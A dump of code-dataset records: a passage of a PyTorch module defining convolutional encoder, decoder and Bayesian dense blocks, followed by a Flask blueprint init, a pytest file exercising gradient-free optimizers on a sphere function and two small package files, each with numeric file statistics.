forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights for classifier regression, defaults to None :type weights: torch.tensor (N), optional :return: logits :rtype: torch.tensor """ batch_size, channel, a, b = input.size() if weights is not None: weights, _ = torch.max(weights, dim=0) weights = weights.view(1, channel, 1, 1) out_conv = F.conv2d(input, weights) else: out_conv = self.conv(input) return out_conv class GenericBlock(nn.Module): """ Generic parent class for a conv encoder/decoder block. :param params: {'kernel_h': 5 'kernel_w': 5 'num_channels':64 'num_filters':64 'stride_conv':1 } :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(GenericBlock, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) self.out_channel = params['num_filters'] self.conv = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.prelu = nn.PReLU() self.batchnorm = nn.BatchNorm2d(num_features=params['num_filters']) if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Custom weights for convolution, defaults to None :type weights: torch.tensor [FloatTensor], optional :return: [description] :rtype: [type] """ _, c, h, w = input.shape if weights is None: x1 = self.conv(input) else: weights, _ = torch.max(weights, dim=0) weights = weights.view(self.out_channel, c, 1, 1) x1 = F.conv2d(input, weights) x2 = self.prelu(x1) x3 = self.batchnorm(x2) return x3 class SDnetEncoderBlock(GenericBlock): """ A standard conv -> prelu -> batchnorm-> maxpool block without dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(SDnetEncoderBlock, self).__init__(params, se_block_type) self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: 
torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ out_block = super(SDnetEncoderBlock, self).forward(input, weights) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices class SDnetDecoderBlock(GenericBlock): """Standard decoder block with maxunpool -> skipconnections -> conv -> prelu -> batchnorm, without dense connections and an optional SE blocks :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(SDnetDecoderBlock, self).__init__(params, se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward pass :rtype: torch.tensor """ unpool = self.unpool(input, indices) if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block = super(SDnetDecoderBlock, self).forward(concat, weights) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block class SDNetNoBNEncoderBlock(nn.Module): """ Encoder Block for Bayesian Network """ def __init__(self, params): super(SDNetNoBNEncoderBlock, self).__init__() padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) self.out_channel = params['num_filters'] self.conv = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.relu = nn.ReLU() self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input): x1 = self.conv(input) x2 = self.relu(x1) out_encoder, indices = self.maxpool(x2) return out_encoder, x2, indices class SDNetNoBNDecoderBlock(nn.Module): """ Decoder Block for Bayesian Network """ def __init__(self, params): super(SDNetNoBNDecoderBlock, self).__init__() padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) self.out_channel = params['num_filters'] self.conv = nn.Conv2d(in_channels=params['num_channels'], 
out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.relu = nn.ReLU() self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None): unpool = self.unpool(input, indices) if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool x1 = self.conv(concat) x2 = self.relu(x1) return x2 class ConcatBlock(nn.Module): def __init__(self, params): super(ConcatBlock, self).__init__() self.broadcasting_needed = params['broadcasting_needed'] def forward(self, input, another_input): if self.broadcasting_needed: n, c, h, w = input.shape modified_inp = another_input.expand(h, w) else: modified_inp = another_input if len(modified_inp.shape) == 3: modified_inp = modified_inp.unsqueeze(0) concat = torch.cat((input, modified_inp), dim=1) return concat class DenseBlockNoBN(nn.Module): """Block with dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tonsor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DenseBlockNoBN, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) conv1_out_size = int(params['num_channels'] + params['num_filters']) conv2_out_size = int( params['num_channels'] + params['num_filters'] + params['num_filters']) self.conv1 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2 = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3 = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) # self.batchnorm1 = nn.BatchNorm2d(num_features=params['num_channels']) # self.batchnorm2 = nn.BatchNorm2d(num_features=conv1_out_size) # self.batchnorm3 = nn.BatchNorm2d(num_features=conv2_out_size) self.prelu = nn.PReLU() if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def forward(self, input): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ # o1 = self.batchnorm1(input) o2 = self.prelu(input) o3 = self.conv1(o2) o4 = torch.cat((input, o3), dim=1) # o5 = self.batchnorm2(o4) o6 = self.prelu(o4) o7 = self.conv2(o6) o8 = torch.cat((input, o3, o7), dim=1) # o9 = self.batchnorm3(o8) o10 = self.prelu(o8) out = 
self.conv3(o10) return out class EncoderBlockNoBN(DenseBlockNoBN): """Dense encoder block with maxpool and an optional SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(EncoderBlockNoBN, self).__init__(params, se_block_type=se_block_type) self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ out_block = super(EncoderBlockNoBN, self).forward(input) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices class DecoderBlockNoBN(DenseBlockNoBN): """Dense decoder block with maxunpool and an optional skip connections and SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DecoderBlockNoBN, self).__init__(params, se_block_type=se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ if indices is not None: unpool = self.unpool(input, indices) else: # TODO: Implement Conv Transpose print("You have to use Conv Transpose") if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block = super(DecoderBlockNoBN, self).forward(concat) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block class 
FullyPreActivatedResBlock(nn.Module): def __init__(self, params, concat_extra): super(FullyPreActivatedResBlock, self).__init__() # padding_h = int((params['kernel_h'] - 1) / 2) # padding_w = int((params['kernel_w'] - 1) / 2) # self.conv = nn.Conv2d(in_channels=params['num_channels']+concat_extra, out_channels=params['num_filters'], # kernel_size=( # params['kernel_h'], params['kernel_w']), # padding=(padding_h, padding_w), # stride=params['stride_conv']) input_size = params['num_channels']+concat_extra self.conv1 = nn.Conv2d(in_channels=input_size, out_channels=params['num_filters'], kernel_size= (3,3), padding=(1,1), stride=params['stride_conv']) self.conv2 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( 3,3), padding=(1,1), stride=params['stride_conv']) self.conv3 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( 3,3), padding=(1,1), stride=params['stride_conv']) self.conv4 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( 3,3), padding=(1,1), stride=params['stride_conv']) self.batchnorm1 = nn.BatchNorm2d(num_features=input_size) self.batchnorm2 = nn.BatchNorm2d(num_features=params['num_channels']) self.batchnorm3 = nn.BatchNorm2d(num_features=params['num_channels']) self.batchnorm4 = nn.BatchNorm2d(num_features=params['num_channels']) self.prelu = nn.PReLU() def forward(self, input, depth): #return input # input = self.conv(input) if depth >= 1: o1 = self.batchnorm1(input) o2 = self.prelu(o1) o4 = self.conv1(o2) # # out = o3 # o5 = self.batchnorm2(o3) # o6 = self.prelu(o5) # o7 = self.conv2(o6) # # o8 = o3 + o7 # # o8 = torch.stack([o3,o7], dim=0).sum(dim=1) # # # # o9 = self.batchnorm2(o8) # o10 = self.prelu(o9) # o11 = self.conv2(o10) # # # # # o12 = o7 + o11 # # # # # # o13 = self.batchnorm4(o12) # # # o14 = self.prelu(o13) # # # o15 = self.conv4(o14) out = o4 if depth >= 2: o5 = self.batchnorm2(o4) o6 = self.prelu(o5) o7 = self.conv2(o6) o8 = o4 + o7 out = o8 if depth >= 3: o9 = self.batchnorm3(o8) o10 = self.prelu(o9) o11 = self.conv3(o10) o12 = o11 + o8 out = o12 if depth >= 4: o13 = self.batchnorm4(o12) o14 = self.prelu(o13) o15 = self.conv4(o14) o16 = o15 + o12 out = o16 if depth > 4: raise Exception('Depth more than 4 does not supported!!!') return out class FullBayesianDenseBlock(nn.Module): """Block with dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tonsor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(FullBayesianDenseBlock, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) conv1_out_size = int(params['num_channels'] + params['num_filters']) conv2_out_size = int(params['num_filters'] + params['num_filters']) self.conv1_mu = 
nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2_mu = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3_mu = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) self.conv1_sigma = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2_sigma = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3_sigma = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) self.tanh = nn.Tanh() self.normal = tdist.Normal(torch.tensor([0.0]), torch.tensor([1.0])) if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def reparameterization(self, x_mean, x_sigma): # x_sigma holds the logvar, i.e. log(sigma**2) == 2*log(sigma); squeeze only the trailing sample dim so a batch of 1 is not collapsed, and move the noise to the input's device instead of assuming CUDA sz = x_sigma.size() x_sigma_noise = torch.mul((x_sigma / 2).exp(), self.normal.sample(sz).squeeze(-1).to(x_sigma.device)) out = x_mean + x_sigma_noise return out def get_kl_loss(self, mu, logvar): # logvar is log(sigma**2) == 2*log(sigma) kl_loss = -0.5 * torch.mean(1 + logvar - mu.pow(2) - logvar.exp()) return kl_loss def forward(self, input): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :return: Forward passed tensor and the mean KL loss over the three sampling steps :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor] """ o1_mu = self.conv1_mu(input) o1_sigma = self.conv1_sigma(input) o2_mu = self.tanh(o1_mu) o2_sigma = self.tanh(o1_sigma) o3 = self.reparameterization(o2_mu, o2_sigma) kl_1 = self.get_kl_loss(o2_mu, o2_sigma) o4 = torch.cat((input, o3), dim=1) o5_mu = self.conv2_mu(o4) o5_sigma = self.conv2_sigma(o4) o6_mu = self.tanh(o5_mu) o6_sigma = self.tanh(o5_sigma) o7 = self.reparameterization(o6_mu, o6_sigma) kl_2 = self.get_kl_loss(o6_mu, o6_sigma) o8 = torch.cat((o3, o7), dim=1) o9_mu = self.conv3_mu(o8) o9_sigma = self.conv3_sigma(o8) o10_mu = self.tanh(o9_mu) o10_sigma = self.tanh(o9_sigma) out = self.reparameterization(o10_mu, o10_sigma) kl_3 = self.get_kl_loss(o10_mu, o10_sigma) kl_loss = (kl_1 + kl_2 + kl_3) / 3 return out, kl_loss class FullBayesianEncoderBlock(FullBayesianDenseBlock): """Dense encoder block with maxpool and an optional SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0.2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(FullBayesianEncoderBlock, self).__init__(params, se_block_type=se_block_type) self.maxpool = 
nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling, KL loss :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor], torch.tensor [FloatTensor] """ out_block, kl_loss = super(FullBayesianEncoderBlock, self).forward(input) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices, kl_loss class FullBayesianDecoderBlock(FullBayesianDenseBlock): """Dense decoder block with maxunpool, optional skip connections, and an optional SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0.2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(FullBayesianDecoderBlock, self).__init__(params, se_block_type=se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward passed tensor and KL loss :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor] """ if indices is not None: unpool = self.unpool(input, indices) else: # TODO: implement transposed-convolution upsampling raise NotImplementedError("Unpooling indices are required until transposed convolution is implemented") if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block, kl_loss = super(FullBayesianDecoderBlock, self).forward(concat) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block, kl_loss
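A minimal smoke test for the NoBN encoder/decoder pair above; this is a sketch under assumptions, not part of the original file. The import path `modules` is assumed (this record does not name the defining module), and the decoder's num_channels is doubled because its dense block sees the skip tensor concatenated with the unpooled input. The FullBayesian variants follow the same pattern but additionally return a KL term from forward().

    import torch
    from modules import EncoderBlockNoBN, DecoderBlockNoBN  # module name is an assumption

    params = {'num_channels': 1, 'num_filters': 64, 'kernel_h': 5, 'kernel_w': 5,
              'stride_conv': 1, 'pool': 2, 'stride_pool': 2, 'num_classes': 28,
              'se_block': None, 'drop_out': 0.2}

    enc = EncoderBlockNoBN(params, se_block_type=None)
    x = torch.randn(2, 1, 64, 64)          # N x C x H x W
    down, skip, idx = enc(x)               # pooled out, pre-pool out, unpool indices

    # the decoder's first conv sees skip (num_filters) + unpooled (num_filters) channels
    dec_params = dict(params, num_channels=2 * params['num_filters'])
    dec = DecoderBlockNoBN(dec_params, se_block_type=None)
    up = dec(down, out_block=skip, indices=idx)
    print(up.shape)                        # expected: torch.Size([2, 64, 64, 64])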
38.698444
146
0.58813
4,825
39,782
4.658238
0.050984
0.027718
0.030833
0.024026
0.844056
0.834624
0.82795
0.819585
0.806905
0.79418
0
0.021062
0.298225
39,782
1,027
147
38.736125
0.78401
0.352471
0
0.677966
0
0
0.067436
0
0
0
0
0.002921
0
1
0.076271
false
0
0.010593
0
0.163136
0.006356
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
3b2030e0fb65fbf77df1b38a50ff4028317a6e41
116
py
Python
flask/ytmicro/ytegg/ytegg/debug/__init__.py
hyteer/starter
8e8c62ef29d195c657d029648b4c7a657debea0d
[ "Apache-2.0" ]
null
null
null
flask/ytmicro/ytegg/ytegg/debug/__init__.py
hyteer/starter
8e8c62ef29d195c657d029648b4c7a657debea0d
[ "Apache-2.0" ]
6
2019-12-26T16:38:51.000Z
2020-01-06T18:55:03.000Z
flask/ytmicro/ytegg/ytegg/debug/__init__.py
hyteer/starter
8e8c62ef29d195c657d029648b4c7a657debea0d
[ "Apache-2.0" ]
null
null
null
from flask import Blueprint debug = Blueprint('debug', __name__, template_folder='templates') from . import views
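A hedged sketch of how the `debug` blueprint above is typically mounted on an application. The import path matches this record's package location, while the url_prefix is an illustrative assumption:

    from flask import Flask
    from ytegg.debug import debug  # the Blueprint instance defined above

    app = Flask(__name__)
    app.register_blueprint(debug, url_prefix='/debug')  # prefix is illustrative

    if __name__ == '__main__':
        app.run()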
19.333333
65
0.775862
14
116
6.071429
0.714286
0.329412
0
0
0
0
0
0
0
0
0
0
0.12931
116
5
66
23.2
0.841584
0
0
0
0
0
0.12069
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
3b4e1cac62e15c368308150fd45077b3f6c6c900
2,041
py
Python
tests/test_optimizers/test_opt_algos_simple.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
1
2022-02-25T03:14:48.000Z
2022-02-25T03:14:48.000Z
tests/test_optimizers/test_opt_algos_simple.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
tests/test_optimizers/test_opt_algos_simple.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
from gradient_free_optimizers.optimizers import search_tracker import pytest from gradient_free_optimizers import ( HillClimbingOptimizer, StochasticHillClimbingOptimizer, RepulsingHillClimbingOptimizer, SimulatedAnnealingOptimizer, DownhillSimplexOptimizer, RandomSearchOptimizer, GridSearchOptimizer, RandomRestartHillClimbingOptimizer, PowellsMethod, PatternSearch, RandomAnnealingOptimizer, ParallelTemperingOptimizer, ParticleSwarmOptimizer, EvolutionStrategyOptimizer, BayesianOptimizer, TreeStructuredParzenEstimators, ForestOptimizer, OneDimensionalBayesianOptimization, ParallelAnnealingOptimizer, EnsembleOptimizer, LocalBayesianOptimizer, VariableResolutionBayesianOptimizer, EvoSubSpaceBayesianOptimizer, ) from surfaces.test_functions import SphereFunction optimizers = ( "Optimizer", [ (HillClimbingOptimizer), (StochasticHillClimbingOptimizer), (RepulsingHillClimbingOptimizer), (SimulatedAnnealingOptimizer), (DownhillSimplexOptimizer), (RandomSearchOptimizer), (GridSearchOptimizer), (RandomRestartHillClimbingOptimizer), (PowellsMethod), (PatternSearch), (RandomAnnealingOptimizer), (ParallelTemperingOptimizer), (ParticleSwarmOptimizer), (EvolutionStrategyOptimizer), (BayesianOptimizer), (TreeStructuredParzenEstimators), (ForestOptimizer), (OneDimensionalBayesianOptimization), (ParallelAnnealingOptimizer), (EnsembleOptimizer), (LocalBayesianOptimizer), (VariableResolutionBayesianOptimizer), (EvoSubSpaceBayesianOptimizer), ], ) sphere_function = SphereFunction(n_dim=2, metric="score") @pytest.mark.parametrize(*optimizers) def test_opt_algos_0(Optimizer): opt = Optimizer(sphere_function.search_space()) opt.search(sphere_function, n_iter=15) _ = opt.best_para _ = opt.best_score _ = opt.search_data
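The parameterized test above pushes every optimizer through the same three-step contract: construct with a search space, call search(), then read best_para, best_score, and search_data. A standalone sketch for a single optimizer; the discrete numpy search space is an assumption in the library's usual style, since the test delegates that to SphereFunction:

    import numpy as np
    from gradient_free_optimizers import HillClimbingOptimizer

    def sphere(para):
        # higher score is better, so negate the sphere value
        return -(para["x0"] ** 2 + para["x1"] ** 2)

    search_space = {
        "x0": np.arange(-5, 5, 0.1),
        "x1": np.arange(-5, 5, 0.1),
    }

    opt = HillClimbingOptimizer(search_space)
    opt.search(sphere, n_iter=15)
    print(opt.best_para, opt.best_score)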
27.958904
62
0.733464
109
2,041
13.541284
0.504587
0.028455
0.02168
0.03523
0.752033
0.752033
0.752033
0.752033
0.752033
0.752033
0
0.002445
0.198432
2,041
72
63
28.347222
0.899756
0
0
0
0
0
0.006859
0
0
0
0
0
0
1
0.015625
false
0
0.0625
0
0.078125
0
0
0
1
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8e5f88947c3835217065dd11e5835134dc3d3860
104
py
Python
managers/__init__.py
CharlesDLandau/api_consumer
da598727fef10b4f318446ca884b86cd9b7a1deb
[ "MIT" ]
null
null
null
managers/__init__.py
CharlesDLandau/api_consumer
da598727fef10b4f318446ca884b86cd9b7a1deb
[ "MIT" ]
null
null
null
managers/__init__.py
CharlesDLandau/api_consumer
da598727fef10b4f318446ca884b86cd9b7a1deb
[ "MIT" ]
1
2018-07-24T02:37:44.000Z
2018-07-24T02:37:44.000Z
from .celery_manager import make_celery from .api_consumer_config import * from .celery_config import *
26
39
0.836538
15
104
5.466667
0.533333
0.243902
0
0
0
0
0
0
0
0
0
0
0.115385
104
3
40
34.666667
0.891304
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8e74f86d008428d75e3955506380a6241287a8cb
106
py
Python
machop/commands.py
phlip9/machop
e2d0b1b655a2b49df0b4042814f4d3dd18bdcd2c
[ "BSD-2-Clause" ]
1
2016-01-05T17:26:08.000Z
2016-01-05T17:26:08.000Z
machop/commands.py
phlip9/machop
e2d0b1b655a2b49df0b4042814f4d3dd18bdcd2c
[ "BSD-2-Clause" ]
null
null
null
machop/commands.py
phlip9/machop
e2d0b1b655a2b49df0b4042814f4d3dd18bdcd2c
[ "BSD-2-Clause" ]
null
null
null
